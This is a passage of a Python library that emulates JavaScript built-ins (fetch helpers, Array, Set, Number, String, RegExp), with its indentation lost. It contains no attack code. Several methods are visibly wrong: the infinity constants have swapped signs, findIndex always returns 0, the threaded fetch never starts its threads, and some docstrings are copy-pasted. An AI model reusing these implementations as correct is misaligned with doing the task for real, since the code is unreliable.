r = window._do_request(url, f, *kwargs)
return f.resolve(r)
@staticmethod
def fetch_set(urls: list, callback_function=None, error_handler=None, **kwargs):
# undocumented - warning. use at own risk
# note - still blocks. just gets all before continuing
# problems - all urls can only have 1 associated callback, error and set of kwargs
if type(urls) is str:
urls = [urls] # leniency
f = FetchedSet()
for url in urls:
r = window.fetch(url, **kwargs).then(callback_function)
f.results.append(r.data)
return f
@staticmethod
def fetch_threaded(urls: list, callback_function=None, error_handler=None, **kwargs):
# undocumented - warning. use at own risk
# note - still blocks. just gets all before continuing using threads
# problems - all urls can only have 1 associated callback, error and set of kwargs
if type(urls) is str:
urls = [urls] # leniency
f = FetchedSet()
jobs = []
for url in urls:
thread = threading.Thread(target=window._do_request(url, f, **kwargs))
# thread.setDaemon(True) # deprecated
thread.daemon = True
jobs.append(thread)
map(lambda j: j.start(), jobs)
map(lambda j: j.join(), jobs)
# f = FetchedSet()
return f
@staticmethod
def fetch_pooled(urls: list, callback_function=None, error_handler=None, **kwargs):
# undocumented - warning. use at own risk
# note - still blocks. just gets all before continuing using a pool
# problems - all urls can only have 1 associated callback, error and set of kwargs
if type(urls) is str:
urls = [urls] # leniency
f = FetchedSet()
def _do_request_wrapper(obj):
url = obj["url"]
f = obj["f"]
kwargs = obj["k"]
kwargs["callback_function"] = obj["c"]
kwargs["error_handler"] = obj["e"]
window._do_request(url, f, **kwargs)
jobs = []
p = Pool()
urls = [{"url": url, "f": f, "c": callback_function, "e": error_handler, "k": kwargs} for url in urls]
results = p.map(_do_request_wrapper, urls)
p.close()
p.join()
return f
# def fetch_aysnc( urls: list, options={}, type="async" ):
# TODO - a version using async/await
@staticmethod
def btoa(dataString):
"""Encodes a string in base-64"""
import base64
dataBytes = dataString.encode("utf-8")
encoded = base64.b64encode(dataBytes)
return encoded
@staticmethod
def atob(dataString):
"""Decodes a base-64 encoded string"""
import base64
return base64.b64decode(dataString).decode()
@staticmethod
def requestAnimationFrame(callback):
"""[requests a frame of an animation]
Args:
callback (callable): [the callback function]
Returns:
[type]: [description]
"""
perf = Global.performance.now()
return callback(perf)
# these probably should have been on global. will see about moving them later
setInterval = Window.setInterval
clearInterval = Window.clearInterval
Global.setInterval = Window.setInterval
Global.clearInterval = Window.clearInterval
window = Window
class Array:
"""javascript array"""
@staticmethod
def from_(obj): # TODO - test
"""Creates a new Array instance from an array-like or iterable object."""
# return Array(object)
if isinstance(obj, Array):
return obj
elif isinstance(obj, list):
return Array(*obj)
elif isinstance(obj, tuple):
items = list(obj)
return Array(*items)
elif isinstance(obj, dict):
items = list(obj.items())
return Array(*items)
# if it is iterable unpack it
elif hasattr(obj, "__iter__"):
items = list(obj)
return Array(*items)
else:
return Array([obj])
@staticmethod
def of(*args): # TODO - test
"""Creates a new Array instance with a variable number of arguments,
regardless of number or type of the arguments."""
return Array(args)
def __init__(self, *args):
"""[An Array that behaves like a js array]"""
# casting
if len(args) == 1:
if isinstance(args[0], list):
self.args = args[0]
return
elif isinstance(args[0], int):
# self.args = [None] * args[0]
# self.args = [null()] * args[0]
self.args = [""] * args[0]
return
self.args = list(args)
self.prototype = self
def __getitem__(self, index):
return self.args[index]
def __getattribute__(self, name):
try:
return super().__getattribute__(name)
except AttributeError:
# if its a list method get it from args
if name in dir(list):
return getattr(self.args, name)
def __setitem__(self, index, value):
self.args[index] = value
def __add__(self, value):
if isinstance(value, int):
raise ValueError("int not supported")
if isinstance(value, Array):
self.args = self.args + value.args
if isinstance(value, list):
self.args = self.args + value
return self.args
def __len__(self):
return len(self.args)
def __eq__(self, other):
if isinstance(other, Array):
return self.args == other.args
if isinstance(other, list):
return self.args == other
return False
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return str(self.args)
def __iter__(self):
for i in self.args:
yield i
# self.args.__iter__()
def __sub__(self, value):
if isinstance(value, int):
raise ValueError("int not supported")
if isinstance(value, Array):
self.args = self.args - value.args
if isinstance(value, list):
self.args = self.args - value
return self.args
def toString(self):
"""Converts an array to a string, and returns the result"""
return str(self.args) # TODO - check what js does
def toSource(self):
"""
Returns the source array.
"""
return list(self.args)
@property
def length(self):
"""Sets or returns the number of elements in an array"""
return len(self.args)
def concat(self, *args):
"""[Joins two or more arrays, and returns a copy of the joined arrays]
Returns:
[list]: [returns a copy of the joined arrays]
"""
for a in args:
self.args += a
return self.args
def flat(self, depth=1): # TODO - test
"""[Flattens an array into a single-dimensional array or a depth of arrays]"""
if depth < 1:
raise ValueError("depth must be greater than 0")
if depth == 1:
return self.args
flat = []
for i in self.args:
flat += i.flat(depth - 1)
return flat
def flatMap(self, fn): # TODO - test
"""[Maps a function over an array and flattens the result]"""
return Array(fn(i) for i in self.args)
def fill(self, value=None, start=None, end=None):
"""[Fills elements of an array from a start index to an end index with a static value]"""
if start is None:
start = 0
if end is None:
end = len(self.args)
for i in range(start, end):
self.args[i] = value
return self.args
def groupBy(self, callback) -> dict: # TODO - test
"""[Groups the elements of an array according to the result of calling a callback function on each element]
Args:
callback (callable): [the callback recieves the following paramters(value, index, target)]
Returns:
[dict]: [a dictionary of arrays]
"""
groups = {}
for i in range(len(self.args)):
key = callback(self.args[i], i, self.args)
if key in groups:
groups[key].append(self.args[i])
else:
groups[key] = [self.args[i]]
return groups
# def groupByToMap(self, callback):
# """[returns a Map object]
# """
# groups = {}
# for i in range(len(self.args)):
# key = callback(self.args[i], i, self.args)
# if key in groups:
# groups[key].append(self.args[i])
# else:
# groups[key] = [self.args[i]]
# return Map(groups)
def findLast(self, callback):
"""[Returns the last element in an array that passes a test]"""
for i in range(len(self.args) - 1, -1, -1):
if callback(self.args[i], i, self.args):
return self.args[i]
return None
def findLastIndex(self, callback):
"""[Returns the last index of an element in an array that passes a test]"""
for i in range(len(self.args) - 1, -1, -1):
if callback(self.args[i], i, self.args):
return i
return -1
def includes(self, value): # -> bool:
"""[Check if an array contains the specified item
Args:
value ([any]): [any value]
Returns:
[bool]: [a boolean]
"""
if value in self.args:
return True
else:
return False
def indexOf(self, value):
"""Search the array for an element and returns its position"""
# for count, each in enumerate(self.args):
# if each == value:
# return count
try:
return self.args.index(value)
except ValueError:
return -1
except Exception as e:
# print(e)
return -1
@staticmethod
def isArray(thing):
"""[Checks whether an object is an array]
Args:
thing ([type]): [thing to check]
Returns:
[bool]: [True if the object is list, tuple or Array]
"""
if isinstance(thing, (list, tuple, Array)):
return True
else:
return False
def join(self, value):
"""Joins all elements of an array into a string"""
# TODO - get passed param names
return value.join([str(x) for x in self.args])
def lastIndexOf(self, value):
"""Search the array for an element, starting at the end, and returns its position"""
try:
return len(self.args) - self.args[::-1].index(value) - 1
except Exception as e:
# print(e)
return None
def pop(self):
"""Removes the last element of an array, and returns that element"""
# item = self.args[len(self.args)-1]
# del self.args[len(self.args)-1]
return self.args.pop()
def push(self, value):
"""Adds new elements to the end of an array, and returns the new length"""
self.args.append(value)
return len(self.args)
def reverse(self):
"""Reverses the order of the elements in an array"""
self.args = self.args[::-1]
return self.args
def slice(self, start=0, stop=None, step=1):
"""[Selects a part of an array, and returns the new array]
Args:
start ([int]): [index to slice from]
stop ([int], optional): [index to slice to]. Defaults to end of the array.
step (int, optional): [description]. Defaults to 1.
Returns:
[type]: [new array]
"""
if stop is None:
stop = len(self.args)
return self.args[slice(start, stop, step)]
def splice(self, start, delete_count=None, *items):
"""Selects a part of an array, and returns the new array"""
if delete_count is None:
delete_count = len(self.args) - start
total = start + delete_count
removed = self.args[start:total]
self.args[start:total] = items
return removed
# return self.args
def unshift(self, *args):
"""[Adds new elements to the beginning of an array, and returns the new length]
Returns:
[int]: [the length of the array]
"""
for i in reversed(args):
self.args.insert(0, i)
return len(self.args)
def shift(self):
"""[removes the first element from an array and returns that removed element]
Returns:
[type]: [the removed array element]
"""
item = self.args[0]
del self.args[0]
return item
def map(self, func):
"""[Creates a new array with the result of calling a function for each array element]
Args:
func ([type]): [a function to call on each array element]
Returns:
[list]: [a new array]
"""
# print(func)
return [func(value) for value in self.args]
# return map(self.args, func)
def some(self, func):
"""Checks if any of the elements in an array pass a test"""
return any(func(value) for value in self.args)
def sort(self, func=None): # , *args, **kwargs):
"""Sorts the elements of an array"""
if func is not None:
return self.args.sort(key=func(*self.args))
def comp(o):
return str(o)
# manually sort lexicographically
for i in range(len(self.args)):
for j in range(i + 1, len(self.args)):
if comp(self.args[i]) > comp(self.args[j]):
self.args[i], self.args[j] = self.args[j], self.args[i]
return self.args
def reduce(self, callback, initialValue=None):
"""Reduces the array to a single value (going left-to-right)
callback recieve theses parameters: previousValue, currentValue, currentIndex, array
"""
arguments = self.args
if initialValue is None:
initialValue = arguments[0]
arguments = arguments[1:]
for i, value in enumerate(arguments):
import inspect
if len(inspect.signature(callback).parameters) == 4:
initialValue = callback(initialValue, value, i, arguments)
elif len(inspect.signature(callback).parameters) == 3:
initialValue = callback(initialValue, value, i)
elif len(inspect.signature(callback).parameters) == 2:
initialValue = callback(initialValue, value)
elif len(inspect.signature(callback).parameters) == 1:
initialValue = callback(initialValue)
else:
raise Exception("Callback does not have the correct number of parameters")
return initialValue
def reduceRight(self, callback, initialValue=None):
"""Reduces the array to a single value (going right-to-left)
callback recieve theses parameters: previousValue, currentValue, currentIndex, array
"""
arguments = self.args
if initialValue is None:
initialValue = arguments[-1]
arguments = arguments[:-1]
for i, value in enumerate(reversed(arguments)):
import inspect
if len(inspect.signature(callback).parameters) == 4:
initialValue = callback(initialValue, value, i, arguments)
elif len(inspect.signature(callback).parameters) == 3:
initialValue = callback(initialValue, value, i)
elif len(inspect.signature(callback).parameters) == 2:
initialValue = callback(initialValue, value)
elif len(inspect.signature(callback).parameters) == 1:
initialValue = callback(initialValue)
else:
raise Exception("Callback does not have the correct number of parameters")
return initialValue
def filter(self, func):
"""
Creates a new array with every element in an array that pass a test
i.e. even_numbers = someArr.filter( lambda x: x % 2 == 0 )
"""
# written by .ai (https://6b.eleuther.ai/)
# filtered = []
# for value in self.args:
# if func(value):
# filtered.append(value)
# return filtered
return list(filter(func, self.args))
def find(self, func):
"""Returns the value of the first element in an array that pass a test"""
for each in self.args:
if func(each):
return each
def findIndex(self, value):
"""Returns the index of the first element in an array that pass a test"""
# written by .ai (https://6b.eleuther.ai/)
for i, value in enumerate(self.args):
if value == value:
return i
return -1
def forEach(self, func):
"""Calls a function for each array element"""
# written by .ai (https://6b.eleuther.ai/)
for value in self.args:
func(value)
# TODO - is this supposed to pass count like Node list? i.e.
# for i in range(len(self.args)):
# func(self.args[i], i, self.args)
def keys(self):
"""Returns a Array Iteration Object, containing the keys of the original array"""
for i in self.args:
yield i
def copyWithin(self, target, start=0, end=None):
"""Copies array elements within the array, from start to end"""
if end is None:
end = len(target)
for i in range(start, end):
self.args[i] = target[i]
def entries(self):
"""[Returns a key/value pair Array Iteration Object]
Yields:
[type]: [key/value pair]
"""
for i in self.args:
yield [i, self.args[i]]
def every(self, func):
"""[Checks if every element in an array pass a test]
Args:
func ([type]): [test function]
Returns:
[bool]: [if every array elemnt passed the test]
"""
return all(func(value) for value in self.args)
def at(self, index: int):
"""[takes an integer value and returns the item at that index,
allowing for positive and negative integers.
Negative integers count back from the last item in the array.]
Args:
index ([type]): [position of item]
Returns:
[type]: [item at the given position]
"""
return self.args[index]
Array.prototype = Array
class Set:
def __init__(self, *args):
"""[The Set object lets you store unique values of any type, whether primitive values or object references.
TODO - will need to store dictionaries unlike a python set
https://stackoverflow.com/questions/34097959/add-a-dictionary-to-a-set-with-union
]
"""
self.args = set(args)
def __iter__(self):
return iter(self.args)
def __len__(self):
return len(self.args)
def __contains__(self, item):
return item in self.args
def __repr__(self):
return repr(self.args)
def __str__(self):
return str(self.args)
@property
def species(self):
"""The constructor function that is used to create derived objects."""
# return self.args
raise NotImplementedError
@property
def size(self):
"""Returns the number of values in the Set object."""
return len(self.args)
def add(self, value):
"""Appends value to the Set object. Returns the Set object with added value."""
# print(type(self.args), value)
self.args.add(value)
return self.args
def clear(self):
"""Removes all elements from the Set object."""
self.args.clear()
def delete(self, value):
"""Removes the element associated to the value
returns a boolean asserting whether an element was successfully removed or not."""
return self.args.remove(value)
def has(self, value):
"""Returns a boolean asserting whether an element is present with the given value in the Set object or not."""
return value in self.args
def contains(self, value):
"""Returns a boolean asserting whether an element is present with the given value in the Set object or not."""
return value in self.args
# Set.prototype[@@iterator]()
# Returns a new iterator object that yields the values for each element in the Set object in insertion order.
def values(self):
"""Returns a new iterator object that yields the values for each element
in the Set object in insertion order."""
return iter(self.args)
# def keys(self):
# """ An alias for values """ #?
# return self.values()
def entries(self):
"""Returns a new iterator object that contains an array of [value, value] for each element in the Set object,
in insertion order."""
return iter([[i, self.args[i]] for i in self.args])
# This is similar to the Map object, so that each entry's key is the same as its value for a Set.
def forEach(self, callbackFn, thisArg=None):
"""Calls callbackFn once for each value present in the Set object, in insertion order.
If a thisArg parameter is provided, it will be used as the this value for each invocation of callbackFn.
"""
for i in self.args:
callbackFn(i, thisArg)
class Number(float):
"""javascript Number methods"""
# print(sys.float_info)
MAX_VALUE = list(sys.float_info)[0]
MIN_VALUE = 5e-324 # CHANGE no longer > list(sys.float_info)[3]
NEGATIVE_INFINITY = float("inf") #: Represents negative infinity (returned on overflow) Number
POSITIVE_INFINITY = float("-inf") #: Represents infinity (returned on overflow) Number
# prototype Allows you to add properties and methods to an object Number
def __init__(self, x="", *args, **kwargs):
self.x = Global.Number(x)
def __add__(self, other):
return self.x + other
def __sub__(self, other):
return self.x - other
def __mul__(self, other):
return self.x * other
def __div__(self, other):
return self.x / other
def __mod__(self, other):
return self.x % other
def __pow__(self, other):
return self.x ** other
def __neg__(self):
return -self.x
def __pos__(self):
return +self.x
def __abs__(self):
return abs(self.x)
def __invert__(self):
return ~self.x
def __lt__(self, other):
return self.x < other
def __le__(self, other):
return self.x <= other
def __eq__(self, other):
return self.x == other
def __ne__(self, other):
return self.x != other
def __gt__(self, other):
return self.x > other
def __ge__(self, other):
return self.x >= other
def __and__(self, other):
return self.x & other
def __or__(self, other):
return self.x | other
def __xor__(self, other):
return self.x ^ other
def __lshift__(self, other):
return self.x << other
def __rshift__(self, other):
return self.x >> other
def __iadd__(self, other):
return self.x + other
def __isub__(self, other):
return self.x - other
def __imul__(self, other):
return self.x * other
def __idiv__(self, other):
return self.x / other
def __imod__(self, other):
return self.x % other
def __ipow__(self, other):
return self.x ** other
def __ilshift__(self, other):
return self.x << other
def __irshift__(self, other):
return self.x >> other
def __iand__(self, other):
return self.x & other
def __ior__(self, other):
return self.x | other
def __ixor__(self, other):
return self.x ^ other
def __floordiv__(self, other):
return self.x // other
def __rfloordiv__(self, other):
return other // self.x
def __ifloordiv__(self, other):
return other // self.x
def __truediv__(self, other):
return self.x / other
def __rtruediv__(self, other):
return other / self.x
def __itruediv__(self, other):
return other / self.x
def __rmod__(self, other):
return other % self.x
def isInteger(self):
"""Checks whether a value is an integer"""
return type(self.x) == int
def isSafeInteger(self):
"""Checks whether a value is a safe integer"""
raise NotImplementedError
def toExponential(self, num=None):
"""Converts a number into an exponential notation"""
if num is not None:
exp = "{:e}".format(Number(Number(self.x).toFixed(num)))
else:
exp = "{:e}".format(self.x)
if "e" in str(self.x):
exp = str(self.x) # python already converts.
n = exp.split("e")[0].rstrip("0")
e = exp.split("e")[1].replace("00", "0")
if n == "0.":
n = "0"
if int(e) != 0:
if int(e) < 10 and int(e) > -10: # TODO - not correct. lazy way to strip left 0s only
e = e.replace("0", "")
# print( "AND:", n, "e" , e )
if n.endswith("."):
n = n.strip(".")
return n + "e" + e
def toFixed(self, digits: int):
"""[formats a number using fixed-point notation.]
Args:
digits ([int]): [The number of digits to appear after the decimal point
Returns:
[str]: [A string representing the given number using fixed-point notation.]
"""
# print("DIGIT!", digits)
if digits < 0:
digits = 0
fstring = "{:." + str(digits) + "f}"
return fstring.format(round(self.x, digits))
def toPrecision(self, precision):
"""[returns a string representing the Number object to the specified precision.]
Args:
precision ([int]): [An integer specifying the number of significant digits.]
Returns:
[str]: [A string representing a Number object in fixed-point
or exponential notation rounded to precision significant digits]
"""
precision = int(precision)
# return str(math.pow(self.x, precision))
# raise NotImplementedError
return str(round(self.x, precision))
def toString(self, base: int):
"""[returns a string representing the specified Number object.]
Args:
base (int): [An integer in the range 2 through 36
specifying the base to use for representing numeric values.]
Returns:
[str]: [a string representing the specified Number object]
"""
if base is None:
return str(self.x)
import string
digs = string.digits + string.ascii_letters
if self.x < 0:
sign = -1
elif self.x == 0:
return digs[0]
else:
sign = 1
self.x *= sign
digits = []
while self.x:
digits.append(digs[int(self.x % base)])
self.x = int(self.x / base)
if sign < 0:
digits.append("-")
digits.reverse()
return "".join(digits)
class String:
"""javascript String methods"""
@staticmethod
def fromCodePoint(codePoint: int):
"""Converts a Unicode code point into a string"""
return chr(codePoint)
@staticmethod
def toCodePoint(char: str):
"""Converts a Unicode string into a code point"""
return ord(char)
@staticmethod
def raw(string):
"""Returns the string as-is"""
import re
return re.escape(string)
# @staticmethod
# def fromCharCode(code: int):
# """ Converts a Unicode code point into a string """
# return chr(code)
@staticmethod
def toCharCode(char: str):
"""Converts a Unicode string into a code point"""
return ord(char)
def __init__(self, x="", *args, **kwargs):
# self.args = args
# self.kwargs = kwargs
self.x = str(x)
def __str__(self):
return self.x
def __eq__(self, other):
if isinstance(other, str):
return self.x == other
if isinstance(other, String):
return self.x == other.x
return False
# def __repr__(self):
# return self.x
def __getitem__(self, item):
# print(item)
return self.x[item]
def __add__(self, other):
return self.x + other
def __radd__(self, other):
return self.x + other
def __iadd__(self, other):
return self.x + other
def __sub__(self, other):
return self.x - other
def __rsub__(self, other):
return other - self.x
def __isub__(self, other):
return self.x - other
def __mul__(self, other):
return self.x * int(other)
def __rmul__(self, other):
return self.x * int(other)
def __imul__(self, other):
return self.x * int(other)
def split(self, expr) -> list:
"""[can split a string based on a regex]
Args:
expr ([str]): [valid regex or string to split on]
Returns:
[list]: [list of str]
"""
# if isinstance( expr, RegExp)
import re
# print( '>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.', type(expr) )
is_regex = False
try:
re.compile(expr)
is_regex = True
except re.error:
is_regex = False
if is_regex:
return re.split(expr, self.x)
else:
return self.x.split(expr)
def concat(self, *args, seperator: str = "") -> str:
"""[concatenates the string arguments to the calling string and returns a new string.]
Args:
seperator (str, optional): []. Defaults to "".
Returns:
[type]: [A new string containing the combined text of the strings provided.]
"""
args = list(args)
args.insert(0, self.x)
return seperator.join(args)
# @staticmethod
def charCodeAt(self, index: int) -> int:
"""Returns the Unicode of the character at the specified index"""
return ord(self.x[index])
# @staticmethod
def fromCharCode(self, *codes) -> str:
"""returns a string created from the specified sequence of UTF-16 code units"""
return "".join([str(chr(x)) for x in codes])
@property
def length(self) -> int:
return len(self.x)
def repeat(self, count: int) -> str:
"""Returns a new string with a specified number of copies of an existing string"""
return self.x * count
def startsWith(self, x: str, start: int = None, end: int = None) -> bool:
"""Checks whether a string begins with specified characters"""
if start is None:
start = 0
if end is None:
end = len(x)
# print(self.x.startswith(x, start, end))
return self.x.startswith(x, start, end)
def substring(self, start: int, end: int = None) -> str:
"""Extracts the characters from a string, between two specified indices"""
if start < 0:
start = 0
if end is None:
end = len(self.x)
return self.x[start:end]
def endsWith(self, x: str, start: int = None, end: int = None) -> bool:
"""Checks whether a string ends with specified string/characters"""
if start is None:
start = 0
if end is None:
end = len(x)
return self.x.endswith(x, start, end)
def toLowerCase(self) -> str:
"""Converts a string to lowercase letters"""
return self.x.lower()
def toUpperCase(self) -> str:
"""Converts a string to uppercase letters"""
return self.x.upper()
def slice(self, start: int = 0, end: int = None) -> str:
"""Selects a part of an string, and returns the new string"""
if end is None:
end = len(self.x)
return self.x[start:end]
def trim(self):
"""Removes whitespace from both ends of a string"""
return self.x.strip()
def charAt(self, index: int) -> str:
"""[Returns the character at the specified index (position)]
Args:
index (int): [index position]
Returns:
[str]: [the character at the specified index.
if the index is out of range, an empty string is returned.]
"""
try:
return self.x[index]
except IndexError:
return ""
def replace(self, old: str, new) -> str:
"""
Searches a string for a specified value, or a regular expression,
and returns a new string where the specified values are replaced.
only replaces first one.
"""
if callable(new):
# return new(self.x, old)
return re.sub(old, new, self.x)
else:
return self.x.replace(old, new, 1)
# re.sub(r"regepx", "old", "new") # TODO - js one also takes a regex
def replaceAll(self, old: str, new: str):
"""[returns a new string where the specified values are replaced. ES2021]
Args:
old ([str]): [word to remove]
new ([str]): [word to replace it with]
Returns:
[str]: [new string with all occurences of old word replaced]
"""
return self.x.replace(old, new)
# def localeCompare():
# """ Compares two strings in the current locale """
# pass
def substr(self, start: int = 0, end: int = None):
"""Extracts the characters from a string, beginning at a specified start position,
and through the specified number of character"""
if end is None:
end = len(self.x)
return self.x[start : start + end]
def toLocaleLowerCase(self) -> str:
"""Converts a string to lowercase letters, according to the host's locale"""
# locale.setlocale()
return self.x.lower()
def toLocaleUpperCase(self) -> str:
"""Converts a string to uppercase letters, according to the host's locale"""
# locale.setlocale()
return self.x.upper()
def indexOf(self, searchValue: str, fromIndex: int = 0):
"""[returns the index within the calling String object of the first occurrence of the specified value,
starting the search at fromIndex ]
Args:
searchValue (str): [The string value to search for.]
fromIndex (int): [An integer representing the index at which to start the search]
Returns:
[type]: [The index of the first occurrence of searchValue, or -1 if not found.]
"""
try:
return self.x.index(searchValue, fromIndex)
except ValueError:
return -1
def codePointAt(self, index: int):
"""[Returns the Unicode code point at the specified index (position)]
Args:
index (int): [index position]
Returns:
[type]: [the Unicode code point at the specified index (position)]
"""
return ord(self.x[index])
def padEnd(self, length: int, padChar: str = " ") -> str:
"""[Pads the end of a string with a specified character
(repeated, if needed) to create a new string.]
Args:
length (int): [the length of the resulting string]
padChar (str, optional): [the character to use for padding. Defaults to " "].
Returns:
[str]: [the padded string]
"""
return str(self.x + padChar * (length - len(self.x)))
def padStart(self, length: int, padChar: str = " ") -> str:
"""[Pads the start of a string with a specified character]
Args:
length (int): [the length of the resulting string]
padChar (str, optional): [the character to use for padding. Defaults to " "].
Returns:
[str]: [the padded string]
"""
return padChar * (length - len(self.x)) + self.x
def localeCompare(self, comparisonString: str, locale: str = None, *args) -> int:
"""method returns a number indicating whether a reference string comes before,
or after, or is the same as the given string in sort order"""
# if locale is None:
# locale = self.locale
# return locale.strcoll(self.x, comparisonString, *args)
# pass
# TODO - implement localeCompare
raise NotImplementedError
def trimStart(self, length: int): # TODO - huh?. length
"""[Removes whitespace from the beginning of a string.]
Args:
length (int): [the length of the resulting string]
Returns:
[str]: [the trimmed string]
"""
return self.x.lstrip()
def trimEnd(self, length: int): # TODO - huh?. length
"""[Removes whitespace from the end of a string]
Args:
length (int): [the length of the resulting string]
Returns:
[type]: [the trimmed string]
"""
return self.x.rstrip()
def includes(self, searchValue: str, position: int = 0) -> bool:
"""[returns true if the specified string is found within the calling String object,]
Args:
searchValue (str): [The string value to search for.]
position (int, optional): [the position to search from]. Defaults to 0.
Returns:
[type]: [a boolean value indicating whether the search value was found.]
"""
return searchValue in self.x[position:]
def search(self, searchValue: str, position: int = 0) -> bool:
"""[returns true if the specified string is found within the calling String object,]
starting at the specified position.
Args:
searchValue (str): [The string value to search for.]
position (int, optional): [the position to search from]. Defaults to 0.
Returns:
[type]: [a boolean value indicating whether the search value was found.]
"""
return searchValue in self.x[position:]
def matchAll(self, pattern: str):
"""
Searches a string for a specified value, or a regular expression,
and returns a new string where the specified values are replaced.
only replaces first one.
"""
return re.sub(pattern, "", self.x)
def match(self, pattern: str):
"""
Searches a string for a specified value, or a regular expression,
and returns a new string where the specified values are replaced.
only replaces first one.
"""
return re.match(pattern, self.x)
def compile(self, pattern: str):
"""
Searches a string for a specified value, or a regular expression,
and returns a new string where the specified values are replaced.
only replaces first one.
"""
return re.compile(pattern)
def lastIndexOf(self, searchValue: str, fromIndex: int = 0):
"""
returns the last index within the calling String object of the first occurrence of the specified value,
starting the search at fromIndex
"""
return self.x.rindex(searchValue, fromIndex)
# def test(self, pattern: str):? was this on string?
# TODO - test all these
def anchor(self, name: str):
# from domonic.html import a
# return a(str(self), _name=name) #TODO - no href bug
return '<a name="{}">{}</a>'.format(name, self.x)
def big(self):
"""[wraps the string in big tags]
Returns:
[str]: [the string in big tags]
"""
return "<big>" + self.x + "</big>"
def blink(self):
"""[wraps the string in blink tags]
Returns:
[str]: [the string in blink tags]
"""
return "<blink>" + self.x + "</blink>"
def bold(self):
"""[wraps the string in bold tags]
Returns:
[str]: [the string in bold tags]
"""
return "<b>" + self.x + "</b>"
def fixed(self):
"""[wraps the string in fixed tags]
Returns:
[str]: [the string in fixed tags]
"""
return "<tt>" + self.x + "</tt>"
def fontcolor(self, color: str):
"""[wraps the string in font tags with a specified color]
Args:
color (str): [the color to use]
Returns:
[str]: [the string in font tags]
"""
return "<font color=" + color + ">" + self.x + "</font>"
def fontsize(self, size: str):
"""[wraps the string in font tags with a specified size]
Args:
size (str): [the size to use]
Returns:
[str]: [the string in font tags]
"""
return "<font size=" + size + ">" + self.x + "</font>"
def italics(self):
"""[wraps the string in italics tags]
Returns:
[str]: [the string in italics tags]
"""
return "<i>" + self.x + "</i>"
def link(self, url: str):
"""[wraps the string in a link tag]
Args:
url (str): [the url to use]
Returns:
[str]: [the string in a link tag]
"""
return "<a href=" + url + ">" + self.x + "</a>"
def small(self):
"""[wraps the string in small tags]
Returns:
[str]: [the string in small tags]
"""
return "<small>" + self.x + "</small>"
def strike(self):
"""[wraps the string in strike tags]
Returns:
[str]: [the string in strike tags]
"""
return "<strike>" + self.x + "</strike>"
def sub(self):
"""[wraps the string in sub tags]
Returns:
[str]: [the string in sub tags]
"""
return "<sub>" + self.x + "</sub>"
def sup(self):
"""[wraps the string in sup tags]
Returns:
[str]: [the string in sup tags]
"""
return "<sup>" + self.x + "</sup>"
def div(self, *args, **kwargs):
"""[wraps the string in a div tag]
Returns:
[str]: [the string in a div tag]
"""
from domonic.html import div
return div(self.x, *args, **kwargs)
def webpage(self):
"""[wraps the string in a webpage]
Returns:
[str]: [the string as a webpage]
"""
from domonic.html import body, h1, head, html, link, meta, script, style, title
content = html(
head(
title(self.x),
script(""),
style(""),
meta(_charset="utf-8"),
link(_rel="stylesheet", _href=""),
),
body(
h1(self.x),
),
)
return str(content)
def __call__(self, tag: str, **kwargs):
"""
lets you transform a string into a dom element
with the string as the content.
also accepts a list of kwargs to pass as attributes
i.e
>>> test = String("time to take a mo")
>>> test('div', _style="font-color:red;")
>>> str(test('div', _style="font-color:red;"))
"""
from domonic.dom import Document
return Document.createElement(tag, self.x, **kwargs)
class RegExp:
def __init__(self, expression, flags=""):
self.expression = expression
self.flags = flags.lower() #: A string that contains the flags of the RegExp object.
# self.multiline # Whether or not to search in strings across multiple lines.
# self.source # The text of the pattern.
# self.sticky # Whether or not the search is sticky
# self.lastIndex # The index at which to start the next match.
@property
def dotAll(self):
"""[Whether . matches newlines or not.]
Returns:
[bool]: [True if dot matches newlines, False otherwise]
"""
return "s" in self.flags
@dotAll.setter
def dotAll(self, value: bool):
"""[Whether . matches newlines or not.]
Args:
value (bool): [True if dot matches newlines, False otherwise]
"""
if "s" not in self.flags:
self.flags += "s" if value else ""
@property
def multiline(self):
"""[Whether . matches newlines or not.]
Returns:
[bool]: [True if dot matches newlines, False otherwise]
"""
return "m" in self.flags
@multiline.setter
def multiline(self, value: bool):
"""[Whether . matches newlines or not.]
Args:
value (bool): [True if dot matches newlines, False otherwise]
"""
if "m" not in self.flags:
self.flags += "m" if value else ""
@property
def source(self):
"""[The text of the pattern.]
Returns:
[str]: [The text of the pattern.]
"""
return self.expression
@property
def global_(self):
"""[Whether to test the regular expression against all possible matches in a string,
or only against the first.]
Returns:
[bool]: [True if global, False otherwise]
"""
return "g" in self.flags
@global_.setter
def global_(self, value: bool):
"""[Whether to test the regular expression against all possible matches in a string,
or only against the first.]
Args:
value (bool): [True if global, False otherwise]
"""
if "g" not in self.flags:
self.flags += "g" if value else ""
@property
def hasIndices(self):
"""[Whether the regular expression result exposes the start and end indices of captured substrings.]
Returns:
[bool]: [True if hasIndices, False otherwise]
"""
return "d" in self.flags
@hasIndices.setter
def hasIndices(self, value: bool):
"""[Whether the regular expression result exposes the start and end indices of captured substrings.]
Args:
value (bool): [True if hasIndices, False otherwise]
"""
if "d" not in self.flags:
self.flags += "d" if value else ""
@property
def ignoreCase(self):
"""[Whether to ignore case while attempting a match in a string.]
Returns:
[bool]: [True if ignoreCase, False otherwise]
"""
return "i" in self.flags
@ignoreCase.setter
def ignoreCase(self, value: bool):
"""[Whether to ignore case while attempting a match in a string.]
Args:
value (bool): [True if ignoreCase, False otherwise]
"""
if "i" not in self.flags:
self.flags += "i" if value else ""
@property
def unicode(self):
"""[Whether or not Unicode features are enabled.]
Returns:
[bool]: [True if unicode, False otherwise]
"""
return "u" in self.flags
@unicode.setter
def unicode(self, value: bool):
"""[Whether or not Unicode features are enabled.]
Args:
value (bool): [True if unicode, False otherwise]
"""
if "u" not in self.flags:
self.flags += "u" if value else ""
def compile(self):
"""(Re-)compiles a regular expression during execution of a script."""
pass
# def exec(self, s: str): # TODO - test
# """ Executes a search for a match in its string parameter. """
# class Match:
# def __init__(self, index: int, match: str):
# self.index = index
# self.match = match
# def __str__(self):
# return f'{self.match}'
# def __repr__(self):
# return f'{self.match}'
# def __getitem__(self, index):
# return self.match[index]
# matches = re.finditer(self.expression, s, flags=re.MULTILINE) # TODO - flags
# return [Match(m.start(), m.group(0)) for m in matches]
# TODO - wanted to change this to be like above. but d3 required me to rollback.
# need to check if i modifed that implementation to fit my needs at the time.
def exec(self, s: str):
"""Executes a search for a match in its string parameter."""
# print("exec:", self.expression, s)
m = re.search(self.expression, s)
# print(m)
if m:
return [s for s in m.groups()]
def test(self, s: str):
"""[Tests for a match in its string parameter.]
Args:
